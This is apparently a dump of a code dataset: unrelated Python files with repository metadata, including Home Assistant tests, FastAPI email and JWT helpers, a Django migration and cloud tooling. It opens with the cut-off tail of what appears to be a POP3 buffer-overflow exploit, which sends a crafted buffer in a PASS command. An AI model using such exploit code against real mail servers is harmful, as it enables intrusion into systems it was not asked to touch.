    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    print "Could not connect to POP3!"
|
[
"[email protected]"
] | |
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1
|
1bed2f766620acf085ed2d7fd3e354a3482b8960
|
/tests/components/sensibo/test_entity.py
|
818d9ddb92499f60c743ebd9a3a8e50177e03817
|
[
"Apache-2.0"
] |
permissive
|
elupus/home-assistant
|
5cbb79a2f25a2938a69f3988534486c269b77643
|
564150169bfc69efdfeda25a99d803441f3a4b10
|
refs/heads/dev
| 2023-08-28T16:36:04.304864 | 2022-09-16T06:35:12 | 2022-09-16T06:35:12 | 114,460,522 | 2 | 2 |
Apache-2.0
| 2023-02-22T06:14:54 | 2017-12-16T12:50:55 |
Python
|
UTF-8
|
Python
| false | false | 2,826 |
py
|
"""The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
    hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
    """Verify the loaded Sensibo integration registers the hallway climate
    device and entity with the expected identifiers."""
    state1 = hass.states.get("climate.hallway")
    assert state1
    # Device registry: the "Hallway" device should carry the Sensibo unique id.
    dr_reg = dr.async_get(hass)
    dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
    dr_entry: dr.DeviceEntry
    for dr_entry in dr_entries:
        if dr_entry.name == "Hallway":
            assert dr_entry.identifiers == {("sensibo", "ABC999111")}
            # NOTE(review): device_id is only bound if a "Hallway" device
            # exists; the lookup below would raise NameError otherwise.
            device_id = dr_entry.id
    # Entity registry: the entity attached to that device keeps its unique_id.
    er_reg = er.async_get(hass)
    er_entries = er.async_entries_for_device(
        er_reg, device_id, include_disabled_entities=True
    )
    er_entry: er.RegistryEntry
    for er_entry in er_entries:
        if er_entry.name == "Hallway":
            assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
    hass: HomeAssistant,
    p_error: Exception,
    load_int: ConfigEntry,
    get_data: SensiboData,
) -> None:
    """Test the Sensibo send command with error.

    First a successful set_fan_mode call updates the state; then the same
    call with the client raising each known Sensibo error must surface as
    HomeAssistantError while leaving the state unchanged.
    """
    state = hass.states.get("climate.hallway")
    assert state
    # Success path: patched client reports "Success" and fan_mode is applied.
    with patch(
        "homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
        return_value={"result": {"status": "Success"}},
    ):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_FAN_MODE,
            {ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
            blocking=True,
        )
    await hass.async_block_till_done()
    state = hass.states.get("climate.hallway")
    assert state.attributes["fan_mode"] == "low"
    # Failure path: the client raising p_error must become HomeAssistantError.
    with patch(
        "homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
        side_effect=p_error,
    ):
        with pytest.raises(HomeAssistantError):
            await hass.services.async_call(
                CLIMATE_DOMAIN,
                SERVICE_SET_FAN_MODE,
                {ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
                blocking=True,
            )
    # State must be unaffected by the failed call.
    state = hass.states.get("climate.hallway")
    assert state.attributes["fan_mode"] == "low"
|
[
"[email protected]"
] | |
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe
|
245b92f4140f30e26313bfb3b2e47ed1871a5b83
|
/airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py
|
7a1cbbf42dce80b65a8b1c81159737e23be143fb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
ephraimbuddy/airflow
|
238d6170a0e4f76456f00423124a260527960710
|
3193857376bc2c8cd2eb133017be1e8cbcaa8405
|
refs/heads/main
| 2023-05-29T05:37:44.992278 | 2023-05-13T19:49:43 | 2023-05-13T19:49:43 | 245,751,695 | 2 | 1 |
Apache-2.0
| 2021-05-20T08:10:14 | 2020-03-08T04:28:27 | null |
UTF-8
|
Python
| false | false | 1,509 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
# Proto-plus module descriptor: registers the message below under the
# vendored googleads v12 errors package.
__protobuf__ = proto.module(
    package="airflow.providers.google_vendor.googleads.v12.errors",
    marshal="google.ads.googleads.v12",
    manifest={"CampaignFeedErrorEnum",},
)
# Generated from the Google Ads API proto definitions; do not edit by hand.
class CampaignFeedErrorEnum(proto.Message):
    r"""Container for enum describing possible campaign feed errors.
    """
    class CampaignFeedError(proto.Enum):
        r"""Enum describing possible campaign feed errors."""
        UNSPECIFIED = 0
        UNKNOWN = 1
        FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
        # NOTE: value 3 is absent here, mirroring the upstream proto.
        CANNOT_CREATE_FOR_REMOVED_FEED = 4
        CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
        CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
        INVALID_PLACEHOLDER_TYPE = 7
        MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
        NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
        LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"[email protected]"
] | |
18d4a948b0ca382c4d01997d274c1deb0cbccddf
|
b92226895d04b0258981864e8604720de9c09f4d
|
/src/utils.py
|
3200a377f749da6ea1b234e191737060009fa795
|
[
"BSD-3-Clause"
] |
permissive
|
aydinmemis/blog_FastAPI
|
e42a6c4f5a9c64154da0f9a23290c274b305838a
|
f584634a2cd410904df6a7d9478044d269737a91
|
refs/heads/master
| 2022-04-06T12:37:59.068303 | 2020-03-11T18:04:14 | 2020-03-11T18:04:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,688 |
py
|
import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment=None):
    """Render the given Jinja templates and send the message over SMTP.

    Fix: ``environment`` previously defaulted to a mutable ``{}`` shared
    across all calls; it now defaults to ``None`` and a fresh dict is created
    per call (backward compatible for every existing caller).

    :param email_to: recipient address
    :param subject_template: Jinja source for the subject line
    :param html_template: Jinja source for the HTML body
    :param environment: template render context; defaults to an empty dict
    """
    assert config.EMAILS_ENABLED, "no provided configuration for email variables"
    if environment is None:
        environment = {}
    message = emails.Message(
        subject=JinjaTemplate(subject_template),
        html=JinjaTemplate(html_template),
        mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
    )
    smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
    if config.SMTP_TLS:
        smtp_options["tls"] = True
    if config.SMTP_USER:
        smtp_options["user"] = config.SMTP_USER
    if config.SMTP_PASSWORD:
        smtp_options["password"] = config.SMTP_PASSWORD
    response = message.send(to=email_to, render=environment, smtp=smtp_options)
    logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
    """Send the "test email" template to *email_to*."""
    subject = f"{config.PROJECT_NAME} - Test email"
    template_path = Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html"
    with open(template_path) as tpl:
        html_body = tpl.read()
    send_email(
        email_to=email_to,
        subject_template=subject,
        html_template=html_body,
        environment={"project_name": config.PROJECT_NAME, "email": email_to},
    )
def send_reset_password_email(email_to: str, email: str, token: str):
    """Send a password-recovery email containing a reset link.

    *email_to* is the destination address, *email* the account username,
    *token* the reset JWT (bytes tokens from older PyJWT are decoded first).
    """
    subject = f"{config.PROJECT_NAME} - Password recovery for user {email}"
    with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as tpl:
        template_str = tpl.read()
    use_token = token.decode() if hasattr(token, "decode") else token
    link = f"{config.SERVER_HOST}/reset-password?token={use_token}"
    send_email(
        email_to=email_to,
        subject_template=subject,
        html_template=template_str,
        environment={
            "project_name": config.PROJECT_NAME,
            "username": email,
            "email": email_to,
            "valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
            "link": link,
        },
    )
def send_new_account_email(email_to: str, username: str, password: str):
    """Send the "new account created" notification email."""
    subject = f"{config.PROJECT_NAME} - New account for user {username}"
    with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as tpl:
        template_str = tpl.read()
    send_email(
        email_to=email_to,
        subject_template=subject,
        html_template=template_str,
        environment={
            "project_name": config.PROJECT_NAME,
            "username": username,
            "password": password,
            "email": email_to,
            "link": config.SERVER_HOST,
        },
    )
def generate_password_reset_token(email):
    """Create a signed JWT carrying *email*, valid for the configured hours."""
    now = datetime.utcnow()
    expires_at = now + timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
    return jwt.encode(
        {
            "exp": expires_at.timestamp(),
            "nbf": now,
            "sub": password_reset_jwt_subject,
            "email": email,
        },
        config.SECRET_KEY,
        algorithm="HS256",
    )
def verify_password_reset_token(token) -> Optional[str]:
    """Return the email embedded in a password-reset token, or None if invalid.

    Invalid means: bad signature, expired / not-yet-valid claims, a wrong
    "sub" claim, or a missing "email" claim.
    """
    try:
        decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
    except InvalidTokenError:
        return None
    # Bug fix: the original used `assert` here, which is stripped under
    # `python -O` and raised an uncaught AssertionError on a wrong subject;
    # a missing "email" claim also raised KeyError.  Reject explicitly.
    if decoded_token.get("sub") != password_reset_jwt_subject:
        return None
    return decoded_token.get("email")
|
[
"[email protected]"
] | |
8179861a56b00ea0aae727ab31ba65679ea3dcb6
|
5c0e83b07e01983b064980b805e6067cd1123714
|
/rd_caltech.py
|
81e59b15ea802ee43b2828b30359ef9bfbe9dc85
|
[
"MIT"
] |
permissive
|
zyg11/MTCNN-TF
|
750ec7b6533b639deba5126e19a434da615585ac
|
4d41c5fd2dc13008d39b868aa2e921a7ff731e10
|
refs/heads/master
| 2020-08-26T14:24:41.084820 | 2019-04-02T09:02:23 | 2019-04-02T09:02:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,656 |
py
|
#author : lxy
#time: 2018.3.23/ 11:30:00
#tool: python3
#version: 0.1
#modify:
#project: pedestrian detection
################################
import numpy as np
import glob
import os
import argparse
def args():
    """Build and parse the command line arguments for this script."""
    parser = argparse.ArgumentParser(description="read caltech txt")
    parser.add_argument(
        '--dir_in',
        type=str,
        default="/home/lxy/Downloads/DataSet/trainval/",
        help='annotation files saved dir ')
    parser.add_argument(
        '--out_file',
        type=str,
        default='train_caltech.txt',
        help='generated outfiles saved')
    return parser.parse_args()
def get_fil():
    """Convert Caltech annotation txt files into a single training list file.

    For every non-empty annotation file, writes one line to the output file:
    "<image name> <fields...>" where each annotation line's first character
    is dropped.  Empty annotation files are counted and skipped.
    """
    parm = args()
    dir_in = parm.dir_in
    out_f = parm.out_file
    file_txts = glob.glob(dir_in + 'annotations/*.txt')
    # Perf fix: the image directory listing is loop-invariant; the original
    # re-globbed the filesystem once per annotation file.
    img_lists = glob.glob(dir_in + 'images/*')
    pass_cnt = 0
    with open(out_f, 'w') as f_wt:
        for file_item in file_txts:
            # `with` guarantees the annotation file is closed on every path.
            with open(file_item, 'r') as f_rd:
                line_list = f_rd.readlines()
            if len(line_list) == 0:
                print("empyt file: ", file_item)
                pass_cnt += 1
                continue
            img_name = file_item.split('/')[-1][:-4]
            # Replace the bare stem with the matching full image file name
            # (keeps the original's "last match wins" behavior).
            for img_one in img_lists:
                img_one_name = img_one.split('/')[-1]
                if img_name in img_one_name:
                    img_name = img_one_name
            f_wt.write("{} ".format(img_name))
            for line in line_list:
                line = line.strip()
                # Drop the leading label character of each annotation line.
                f_wt.write("{} ".format(line[1:]))
            f_wt.write("\n")
    print("pass ", pass_cnt)
print("pass ",pass_cnt)
# Run the conversion only when executed as a script.
if __name__=="__main__":
    get_fil()
|
[
"[email protected]"
] | |
f099e8563d50a673936df3dfddd48a1bcda5b76d
|
2b3ed6bef2f569448918b8be72c733614c231fce
|
/hdf5_example.py
|
dd3342f3c57d95a4688d33cb9ed830c521fb325f
|
[] |
no_license
|
jackdbd/dask-playground
|
8e67024ba60fbac3ff1ad77b94363731c04c0afd
|
721bc234eadf13e9ef24173bbbc9a68761bf1a7c
|
refs/heads/master
| 2021-04-25T19:58:47.303280 | 2017-11-01T12:49:00 | 2017-11-01T12:49:00 | 109,123,767 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 554 |
py
|
import os
import h5py
import numpy as np
import dask.array as da
h5file_path = 'myfile.hdf5'

# Start from a clean slate: remove any file left over from a previous run.
if os.path.exists(h5file_path):
    os.unlink(h5file_path)

# create a continuous uniform distribution between 0.0 and 1.0
arr = np.random.random(size=(10000, 2000))

# Write the array to HDF5, then read it back and average it with dask.
with h5py.File(h5file_path, 'w') as h5f:
    h5f.create_dataset('dataset_1', data=arr)

with h5py.File(h5file_path, 'r') as h5f:
    dset = h5f['dataset_1'][:]  # [:] materializes the whole dataset in memory
    x = da.from_array(dset, chunks=(1000, 1000))
    result = x.mean().compute()

print(result)  # should be pretty close to 0.5
|
[
"[email protected]"
] | |
b70471b30ed693024129232b607386dcc2056eed
|
4d05be863b63a56a90b4c46b15069827b33ecaae
|
/Algorithms/leetcode/088_merge_sorted_array.py
|
cdc7c4756f42f6563a0e1d9faa78195016a55fbc
|
[] |
no_license
|
leeo1116/PyCharm
|
e532fa9754056019508cc454214ee1a8ad9b26a9
|
b6942c05c27556e5fe47879e8b823845c84c5430
|
refs/heads/master
| 2022-11-06T00:43:14.882453 | 2017-07-13T04:50:00 | 2017-07-13T04:50:00 | 36,851,636 | 0 | 1 | null | 2022-10-20T10:44:39 | 2015-06-04T06:09:09 |
Python
|
UTF-8
|
Python
| false | false | 775 |
py
|
__author__ = 'Liang Li'
class Solution:
    # @param {integer[]} nums1
    # @param {integer} m
    # @param {integer[]} nums2
    # @param {integer} n
    # @return {void} Do not return anything, modify nums1 in-place instead.
    def merge(self, nums1, m, nums2, n):
        """Merge sorted nums2 (n items) into sorted nums1 (m items) in place.

        nums1 has at least m + n slots; filling from the back guarantees no
        unread element of nums1 is overwritten.
        """
        write = m + n - 1
        a, b = m - 1, n - 1
        while a >= 0 and b >= 0:
            if nums1[a] > nums2[b]:
                nums1[write] = nums1[a]
                a -= 1
            else:
                nums1[write] = nums2[b]
                b -= 1
            write -= 1
        # Any leftover nums2 entries belong at the front; leftover nums1
        # entries are already in place.
        while b >= 0:
            nums1[write] = nums2[b]
            b -= 1
            write -= 1
# Demo: guarded so importing this module does not execute the example.
if __name__ == "__main__":
    s = Solution()
    nums1 = [2, 5, 8, 12, 0, 0, 0, 0]
    nums2 = [1, 3, 4, 10]
    s.merge(nums1, 4, nums2, 4)
    print(nums1)
|
[
"[email protected]"
] | |
2316ed9192f542f72a25d3038b16c60e3271862f
|
68b7d7b72a9d87123373f1e4523bf3655564769d
|
/backend/course/migrations/0001_initial.py
|
0ce22a04074cfc9aad1aacd1a19265b0239921a5
|
[] |
no_license
|
crowdbotics-apps/help-procrastinatio-22418
|
c5a85b31e85b87e9d4e39f402ca3f037d916c990
|
b2a967a5b930ba5cacbeeea702ca9aba71899687
|
refs/heads/master
| 2023-01-09T12:19:42.589420 | 2020-11-08T23:45:22 | 2020-11-08T23:45:22 | 311,177,250 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,517 |
py
|
# Generated by Django 2.2.17 on 2020-11-08 23:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django (see header); defines the initial schema for
    # the course app: Category, Course, Event, Group, SubscriptionType,
    # Subscription, Recording, PaymentMethod, Module, Lesson, Enrollment.
    # Do not hand-edit field definitions after it has been applied.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256)),
            ],
        ),
        migrations.CreateModel(
            name='Course',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(blank=True, max_length=256, null=True)),
                ('description', models.TextField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='course_author', to=settings.AUTH_USER_MODEL)),
                ('categories', models.ManyToManyField(blank=True, related_name='course_categories', to='course.Category')),
            ],
        ),
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256)),
                ('date', models.DateTimeField()),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='event_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Group',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256)),
            ],
        ),
        migrations.CreateModel(
            name='SubscriptionType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256)),
            ],
        ),
        migrations.CreateModel(
            name='Subscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('subscription_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_subscription_type', to='course.SubscriptionType')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Recording',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('media', models.URLField()),
                ('published', models.DateTimeField()),
                ('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_event', to='course.Event')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='PaymentMethod',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('primary', models.BooleanField()),
                ('token', models.CharField(max_length=256)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='paymentmethod_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Module',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=256)),
                ('description', models.TextField()),
                ('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='module_course', to='course.Course')),
            ],
        ),
        migrations.CreateModel(
            name='Lesson',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=256)),
                ('description', models.TextField()),
                ('media', models.URLField()),
                ('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lesson_module', to='course.Module')),
            ],
        ),
        migrations.CreateModel(
            name='Enrollment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_course', to='course.Course')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"[email protected]"
] | |
99681c36be3784e520c6d493f540d54bbb5b6ac4
|
d8a5fc2195165c970e2340eee87ae2ad5322da29
|
/{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/views.py
|
48573cfdc703cc624f8d89eccaf4fa0037280c73
|
[
"BSD-3-Clause"
] |
permissive
|
lendlsmith/chrisdev-cookiecutter
|
b76e6194aa8369c2dbf1dac73e3282e025d2b146
|
e0ab2d16bd1a066800ce46bb1740b1254c259a70
|
refs/heads/master
| 2021-10-11T22:20:02.391847 | 2014-07-21T16:57:32 | 2014-07-21T16:57:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
from django.views.generic import ListView, DetailView
from filer.models import Folder
class GalleryListView(ListView):
    """List galleries: the children of the 'Gallery' folder, newest first."""
    template_name = "gallery/gallery_archive.html"

    def get_queryset(self):
        # Bug fix: the original evaluated the queryset at import time inside
        # the class body, which runs a DB query on module import (breaks
        # migrations/tests) and never refreshes.  Query per request instead.
        try:
            return Folder.objects.get(
                name='Gallery').children.all().order_by('-created_at')
        except Folder.DoesNotExist:
            # No 'Gallery' folder yet: show an empty archive instead of the
            # original queryset=None, which errors inside ListView.
            return Folder.objects.none()
class GalleryDetailView(DetailView):
    """Detail view for one gallery (a child folder of 'Gallery')."""
    template_name = "gallery/gallery_detail.html"

    def get_queryset(self):
        # Bug fix: the original evaluated the queryset at import time inside
        # the class body, which runs a DB query on module import (breaks
        # migrations/tests) and never refreshes.  Query per request instead.
        try:
            return Folder.objects.get(name='Gallery').children.all()
        except Folder.DoesNotExist:
            # No 'Gallery' folder yet: 404 via an empty queryset instead of
            # the original queryset=None, which errors inside DetailView.
            return Folder.objects.none()
|
[
"[email protected]"
] | |
4528a59aa0db7486bbbf2a3cb6b8db98636d7a1b
|
17e60f61fc82e7369802a1c597b58b0206ad9bec
|
/lib/poolLoop.py
|
0a25964115c941e48f0dbddf08013eda3d965d6c
|
[] |
no_license
|
SLB-DeN/opensvc
|
5e06d42947f51662fa16203a00670a88b9e1fea9
|
75baeb19e0d26d5e150e770aef4d615c2327f32e
|
refs/heads/master
| 2021-05-17T05:35:18.585791 | 2020-03-19T15:20:05 | 2020-03-19T15:20:05 | 250,651,667 | 1 | 0 | null | 2020-03-27T21:29:22 | 2020-03-27T21:29:22 | null |
UTF-8
|
Python
| false | false | 1,366 |
py
|
from __future__ import print_function
import os
import pool
import rcExceptions as ex
from rcUtilities import lazy, justcall
class Pool(pool.Pool):
    """Storage pool backed by loopback image files under a directory."""
    type = "loop"
    capabilities = ["rox", "rwx", "roo", "rwo", "blk"]

    @lazy
    def path(self):
        # Directory holding the <name>.img loop files (from configuration).
        return self.oget("path")

    def translate(self, name=None, size=None, fmt=True, shared=False):
        # Build the resource definitions for a volume of this pool: one loop
        # disk resource, plus fs resource(s) when fmt is requested.
        data = [
            {
                "rtype": "disk",
                "type": "loop",
                "file": os.path.join(self.path, "%s.img" % name),
                "size": size,
            }
        ]
        if fmt:
            data += self.add_fs(name, shared)
        return data

    def pool_status(self):
        # Report name/type/capabilities plus free/used/size (kilobytes),
        # parsed from `df -P` on the pool directory (created if missing).
        from converters import convert_size
        if not os.path.exists(self.path):
            os.makedirs(self.path)
        data = {
            "name": self.name,
            "type": self.type,
            "capabilities": self.capabilities,
        }
        cmd = ["df", "-P", self.path]
        out, err, ret = justcall(cmd)
        if ret != 0:
            # df failed: return the static fields only.
            return data
        # Last df line: Filesystem Size Used Avail Capacity Mounted-on.
        l = out.splitlines()[-1].split()
        data["free"] = convert_size(l[3], default_unit="K", _to="k")
        data["used"] = convert_size(l[2], default_unit="K", _to="k")
        data["size"] = convert_size(l[1], default_unit="K", _to="k")
        data["head"] = self.path
        return data
|
[
"[email protected]"
] | |
9498aefa8f146488465c0dc49bcdcfecb6c2c61c
|
3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be
|
/google-cloud-sdk/lib/googlecloudsdk/surface/compute/resource_views/resources/add.py
|
91a1766af1560f7ca696cc64491c0c49bb5e745d
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
twistedpair/google-cloud-sdk
|
37f04872cf1ab9c9ce5ec692d2201a93679827e3
|
1f9b424c40a87b46656fc9f5e2e9c81895c7e614
|
refs/heads/master
| 2023-08-18T18:42:59.622485 | 2023-08-15T00:00:00 | 2023-08-15T12:14:05 | 116,506,777 | 58 | 24 | null | 2022-02-14T22:01:53 | 2018-01-06T18:40:35 |
Python
|
UTF-8
|
Python
| false | false | 2,988 |
py
|
# Copyright 2014 Google Inc. All Rights Reserved.
"""'resourceviews resources add' command."""
from apiclient import errors
from googlecloudsdk.api_lib.compute import rolling_updates_util as util
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Add(base.Command):
    """Add resources to a resource view."""

    @staticmethod
    def Args(parser):
        """Args is called by calliope to gather arguments for this command.

        Args:
          parser: An argparse parser that you can use to add arguments that go
            on the command line after this command. Positional arguments are
            allowed.
        """
        parser.add_argument(
            'resource',
            nargs='+',
            help=('A list of fully-qualified URLs to each resource that should '
                  'be added to this view. For example: '
                  'https://www.googleapis.com/compute/v1/projects/myproject/'
                  'zones/us-central1-a/instances/instance-1'))

    def Run(self, args):
        """Run 'resourceviews resources add'.

        Args:
          args: argparse.Namespace, The arguments that this command was invoked
            with.

        Raises:
          HttpException: A http error response was received while executing api
            request.
          ToolException: An error other than http error occured while executing
            the command.
        """
        zone_views_client = self.context['zoneViewsClient']
        region_views_client = self.context['regionViewsClient']

        # NOTE(review): args.region / args.zone / args.resourceview are not
        # declared in Args above -- presumably added by shared flags on the
        # command group; verify against the group definition.
        project = properties.VALUES.core.project.Get(required=True)
        request_body = {'resources': args.resource}
        if 'v1beta1' in self.context['api_version']:
            # v1beta1 splits the call by scope (region vs zone) and uses the
            # lower-case `addresources` method with projectName parameters.
            if args.region:
                request = region_views_client.addresources(
                    projectName=project,
                    region=args.region,
                    resourceViewName=args.resourceview,
                    body=request_body)
            else:
                request = zone_views_client.addresources(
                    projectName=project,
                    zone=args.zone,
                    resourceViewName=args.resourceview,
                    body=request_body)
        else:
            # Later API versions are zonal only and use camelCase addResources.
            request = zone_views_client.addResources(
                project=project,
                zone=args.zone,
                resourceView=args.resourceview,
                body=request_body)

        try:
            request.execute()
            log.Print('Resources added to resource view {0}.'.format(
                args.resourceview))
        except errors.HttpError as error:
            # Translate API errors into gcloud-facing exceptions.
            raise exceptions.HttpException(util.GetError(error))
        except errors.Error as error:
            raise exceptions.ToolException(error)
Add.detailed_help = {
'brief': 'Add resources to a resource view.',
'DESCRIPTION': """\
This command adds resources to a resource view. You must provide a
list of fully-qualified URLs for each resource.
Alternatively, you can also use the addinstances command and provide
resource names rather than URLs.
""",
}
|
[
"[email protected]"
] | |
f57a5a411bc4bd9daee914c2fc13faf4310bdc9b
|
97ca8aedfc7959f99bf5add51c2fbb9d535c5aff
|
/tcml_tools/slurmer/parse/group.py
|
6142cd427c107f81a3ddab7c8eda3c9d7558ae77
|
[] |
no_license
|
cogsys-tuebingen/tcml_tools
|
74b930b8109ef0ad559584bb51808edb83fe4e8c
|
4eabeb08e34993143c729136dc4349043dde00ad
|
refs/heads/main
| 2023-06-02T02:27:13.915943 | 2021-06-09T07:01:23 | 2021-06-09T07:01:23 | 359,801,189 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,582 |
py
|
import numpy as np
from typing import Union
from collections import OrderedDict, defaultdict
from tcml_tools.slurmer.parse import Result, Metrics
class Group:
    """
    A group of slurm jobs that share parameters (except e.g. seed)
    metrics will be computed over groups
    """
    # Class-level shared state: a placeholder Result for missing cells, plus
    # registries of every parameter/result key ever seen across *all* groups
    # (OrderedDicts used as ordered sets, to build consistent table columns).
    default_result = Result("__default__", -1, float_acc=1)
    all_param_keys = OrderedDict()
    all_result_keys = OrderedDict()

    def __init__(self, name: str, ids: list, **kwargs):
        # name: group label; ids: slurm job ids; kwargs: shared parameters.
        self.name = name
        self.ids = [int(i) for i in ids]
        self.params = kwargs
        self.data = defaultdict(dict)   # slurm id -> {metric key -> series}
        self.results = OrderedDict()    # result name -> Result
        for k in kwargs.keys():
            # Register this group's parameter keys in the global registry.
            Group.all_param_keys[k] = True

    def get(self, key: str, default=None):
        """ get param/result, or default otherwise """
        if key in self.params:
            return self.params.get(key)
        if key in self.results:
            return self.results.get(key).value
        return default

    def get_param_tuple(self, skip_keys=()) -> tuple:
        """ get a tuple of all parameter-values, except for the skipped ones """
        return tuple([self.params.get(k, '') for k in self.all_param_keys.keys() if k not in skip_keys])

    @staticmethod
    def __filter(dct: OrderedDict, ignore_keys=()) -> OrderedDict:
        # Shallow copy with the given keys removed (input is not mutated).
        new_dct = dct.copy()
        for key in ignore_keys:
            new_dct.pop(key, None)
        return new_dct

    @staticmethod
    def sorted_param_keys(**filter_kwargs):
        """ all known parameter keys of all groups """
        return sorted([k for k in Group.__filter(Group.all_param_keys, **filter_kwargs).keys()])

    def merge(self, other: 'Group'):
        """ merge another group into this one, keep this name """
        self.ids.extend(other.ids)
        self.params.update(other.params)
